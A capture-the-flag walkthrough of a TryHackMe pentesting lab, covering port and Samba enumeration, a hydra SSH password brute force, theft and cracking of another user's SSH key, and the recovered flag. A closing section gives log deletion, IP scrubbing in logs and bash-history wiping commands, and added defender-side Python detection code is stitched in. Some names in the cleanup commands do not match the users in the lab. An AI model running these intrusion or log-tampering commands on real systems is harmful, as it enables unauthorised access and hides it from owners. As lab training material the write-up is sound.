
basicpentestingjt

URL: https://tryhackme.com/room/basicpentestingjt (difficulty: Easy)

PHASE 1: Reconnaissance

Description of the room:

In this set of tasks you’ll learn the following:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.

Credits to Josiah Pierce from Vulnhub.

PHASE 2: Scanning & Enumeration

Running: nmap

Ran the following:

nmap -sC -sV xxx.xxx.xxx.xxx

Which produced the following output:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-17 23:17 EST
Nmap scan report for 10.10.183.192
Host is up (0.28s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds

Also see: nmap.log

Enumerating Samba Users

Since Samba is running, we can run:

/usr/share/enum4linux/enum4linux.pl -a xxx.xxx.xxx.xxx

This resulted in the following log (truncated for space; only the user-enumeration portion is kept):

=======================================================================
| Users on 10.10.145.91 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

From this, we know we have at least two local users: jan and kay.

Finding Web Server Folders

To attempt to find subfolders on the web server, GoBuster was used via:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://xxx.xxx.xxx.xxx/

This is what allowed us to find the /development folder:

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.183.192/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/17 23:22:47 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 320] [--> http://10.10.183.192/development/]

Also see: gobuster.log

Attempting to guess jan’s SSH password

Using hydra, we try RockYou passwords over SSH with:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://xxx.xxx.xxx.xxx

Which resulted in:

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-17 23:30:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.183.192:22/
[STATUS] 170.00 tries/min, 170 tries in 00:01h, 14344231 to do in 1406:18h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 14344063 to do in 2121:55h, 16 active
[STATUS] 109.29 tries/min, 765 tries in 00:07h, 14343636 to do in 2187:29h, 16 active
[22][ssh] host: 10.10.183.192 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-17 23:37:48

This is where we discovered the password armando for user jan.

Also see: hydra.log
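As an added defender-side example (not part of this write-up), this is the detection the hydra run above should trigger on the target: it parses sshd password-auth lines from auth.log, counts failures per source inside a sliding window, and notes whether the same source later logged in successfully. The sample lines are constructed; the threshold and window size are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines (not a real capture): a burst of failures for "jan" from one
# source within a minute, that source's later success, and one unrelated failure.
SAMPLE_LOG = [
    f"Jan 17 23:30:{s:02d} target sshd[{1200 + s}]: Failed password for jan "
    f"from 10.10.2.14 port {40000 + s} ssh2" for s in range(0, 48, 4)
] + [
    "Jan 17 23:37:48 target sshd[1300]: Accepted password for jan from 10.10.2.14 port 40100 ssh2",
    "Jan 17 23:31:05 target sshd[1250]: Failed password for kay from 10.10.9.9 port 51000 ssh2",
]

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2"
)

def parse(line, year=2022):
    """Return (timestamp, result, user, ip) for a password-auth sshd line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(lines, threshold=10, window_s=60):
    """Map source IP -> (total failures, users tried, success seen) for every source
    with at least `threshold` failed logins inside some `window_s`-second window."""
    events = sorted(e for e in (parse(l) for l in lines) if e)
    by_ip = defaultdict(list)
    for ts, result, user, ip in events:
        by_ip[ip].append((ts, result, user))
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [(ts, user) for ts, result, user in evs if result == "Failed"]
        start = peak = 0
        for end in range(len(fails)):            # sliding window over failure times
            while (fails[end][0] - fails[start][0]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            # a success from the same source after the burst means a guess worked
            success = any(result == "Accepted" for _, result, _ in evs)
            alerts[ip] = (len(fails), sorted({u for _, u in fails}), success)
    return alerts
```

Hydra's own status lines above show roughly 110 to 170 tries per minute, so even a modest threshold fires within the first minute of the attack.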

PHASE 3: Gaining Access

Privilege Escalation from jan to kay.

In the process of running LinPEAS, we found that user jan had read access to user kay’s SSH private key. So, the key was retrieved via:

cat /home/kay/.ssh/id_rsa

When attempting to log into the server as Kay via:

ssh kay@xxx.xxx.xxx.xxx -i ./kay_id_rsa

We are prompted for a passphrase: the SSH private key is passphrase-protected.

Processing Kay’s Private SSH Key

We can take that private key:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
(...snip...)
e5ofsDLuIOhCVzsw/DIUrF+4liQ3R36Bu2R5+kmPFIkkeW1tYWIY7CpfoJSd74VC
3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
-----END RSA PRIVATE KEY-----

We can convert that private key into a format “John the Ripper” understands, so that it can crack the passphrase. We do that by running the ssh2john.py script that ships with John the Ripper (jumbo):

ssh2john.py ./kay_id_rsa > ./kay_id_rsa.hash

This produces the following hash of the private key file, in a form John the Ripper can attack to recover the passphrase:

./kay_rsa_id:$sshng$1$16$6ABA7DE35C{...snip...}edb337116fa6e5ed858

We then run John the Ripper against it, using a word list:

john --wordlist=/usr/share/wordlists/rockyou.txt ./kay_id_rsa.hash

We ultimately determine the passphrase for the SSH key is: beeswax.

Once logged in as user kay, we could read the pass.bak file which had the final flag of: heresareallystrongpasswordthatfollowsthepasswordpolicy$$.
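An added example, not from the original write-up, that audits for both weaknesses used in this phase: a private key that another local user can read (how jan obtained kay’s key) and a key protected only by the legacy PEM scheme (Proc-Type/DEK-Info headers), whose key derivation is a single MD5 pass, which is why ssh2john plus a wordlist recovers the passphrase quickly. The key files it inspects are constructed in a temporary directory, and the classification labels are my own.

```python
import base64
import stat
import struct
import tempfile
from pathlib import Path

def classify_key(data: bytes) -> str:
    """Label how a private key is protected, from its header alone."""
    text = data.decode("ascii", "replace")
    if "-----BEGIN OPENSSH PRIVATE KEY-----" in text:
        blob = base64.b64decode("".join(ln for ln in text.splitlines() if "-----" not in ln))
        off = 15                                # skip the "openssh-key-v1\0" magic
        def field():                            # next length-prefixed SSH string
            nonlocal off
            n = struct.unpack(">I", blob[off:off + 4])[0]
            off += 4 + n
            return blob[off - n:off]
        cipher, kdf, kdfopts = field(), field(), field()
        if cipher == b"none":
            return "openssh-unencrypted"
        salt_len = struct.unpack(">I", kdfopts[:4])[0]
        rounds = struct.unpack(">I", kdfopts[4 + salt_len:8 + salt_len])[0]
        return f"openssh-{kdf.decode()}-{rounds}-rounds"   # bcrypt: costly per guess
    if "Proc-Type: 4,ENCRYPTED" in text and "DEK-Info:" in text:
        return "legacy-pem-encrypted-md5-kdf"   # kay's key: one MD5 per guess, cheap to crack
    if "PRIVATE KEY-----" in text:
        return "legacy-pem-unencrypted"
    return "not-a-private-key"

def audit_key(path: Path):  # -> (protection label, True if group/others can read it)
    kind = classify_key(path.read_bytes()[:4096])
    mode = stat.S_IMODE(path.stat().st_mode)
    return kind, bool(mode & (stat.S_IRGRP | stat.S_IROTH))

def demo():
    """Constructed (not real) keys: a kay-style legacy key left readable by others,
    and a modern OpenSSH-format header using bcrypt with 16 rounds at mode 0600."""
    legacy = (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
              b"DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\nAAAA\n"
              b"-----END RSA PRIVATE KEY-----\n")
    def s(v): return struct.pack(">I", len(v)) + v          # SSH string encoding
    blob = b"openssh-key-v1\0" + s(b"aes256-ctr") + s(b"bcrypt") + s(s(b"\0" * 16) + struct.pack(">I", 16))
    modern = b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob) + b"\n-----END OPENSSH PRIVATE KEY-----\n"
    out, d = {}, Path(tempfile.mkdtemp())
    for name, body, mode in (("kay_id_rsa", legacy, 0o644), ("id_ed25519", modern, 0o600)):
        (d / name).write_bytes(body)
        (d / name).chmod(mode)
        out[name] = audit_key(d / name)
    return out
```

With a current OpenSSH, `ssh-keygen -p -a 100 -f <keyfile>` re-encrypts a legacy key in the new format with 100 bcrypt rounds, which makes each wordlist guess far more expensive than the single MD5 the DEK-Info scheme costs.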

PHASE 4: Maintaining Access

This is a test machine. However, in a Red Team scenario, we could:

  • Add SSH key to /root/.ssh/authorized_keys
  • Create a privileged account that wouldn’t draw attention (ex: operations).
  • Install some other backdoor or service.

PHASE 5: Clearing Tracks

This is a test machine. However, in a Red Team scenario, we could:

Delete relevant logs from /var/log/ - although that might draw attention

rm -Rf /var/log/*

Search and replace our IP address in all logs via

find /var/log -name "*" -exec sed -i 's/10.10.2.14/127.0.0.1/g' {} \;

Wipe bash history for any accounts we used via

cat /dev/null > /root/.bash_history

cat /dev/null > /home/kathy/.bash_history

cat /dev/null > /home/sam/.bash_history